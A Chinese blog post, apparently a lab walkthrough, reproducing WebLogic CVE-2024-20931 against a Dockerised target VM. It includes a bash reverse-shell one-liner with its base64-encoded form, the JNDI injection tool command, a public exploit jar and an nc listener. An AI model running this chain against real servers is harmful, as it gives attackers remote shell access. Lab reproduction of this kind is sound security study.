weblogic && CVE-2024-20931 [≧ ﹏ ≦复现]
  R5XZQ7LN12kp 2024年03月10日 38 0

漏洞编号:CVE-2024-20931

一、环境准备:

1台Windows主机(10.46.47.227)作为攻击机 | 1台centos虚拟机(192.168.172.172)作为目标机 | 虚拟机网络模式为nat

二、搭建漏洞环境

1、docker拉取镜像

1.1 docker pull ismaleiva90/weblogic12 | 我已先完成(截图丢失),大概4~5g,拉取问题:国内镜像证书失效

解决链接:https://www.cnblogs.com/digdeep/p/12236637.html

2、启动环境

2.1 docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest

3、访问网页

3.1 查看虚拟机ip命令:ifconfig

3.2 先在虚拟机中访问192.168.172.172:7001,加/console就是weblogic的控制页面(后半句无用)


3.3 再测试从Windows主机能否访问192.168.172.172::7001

三、利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

工具链接:https://github.com/welk1n/JNDI-Injection-Exploit
(同样需要Java环境)

1、利用该工具反弹shell(需编码)

1.1 在线编码工具:https://ares-x.com/tools/runtime-exec

bash -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40Ni40Ny4yMjcvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}

2、运行JNDI注入工具:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编 码后的反弹Shell命令" -A "攻击机IP"

四、利用CVE-2024-20931.jar工具

工具链接:https://github.com/dinosn/CVE-2024-20931

1、 下载到Windows主机中,Java环境需配置

我的为Java8

2、先检验一下漏洞

java -jar CVE-2024-20931.jar

2.1 从此图

2.2 到此图了,说明存在漏洞,就可以开启监听,nc -lvnp 4444

Windows需自行安装nc
image

3、此时就要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

3.1 填入10.46.47.227:1389/xgec8w

image

3.2 反弹监听成功

image
image

相关链接:https://mp.weixin.qq.com/s/XwQZ6BqWvU72O4XTXOlovg

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2024年03月10日 0

暂无评论

推荐阅读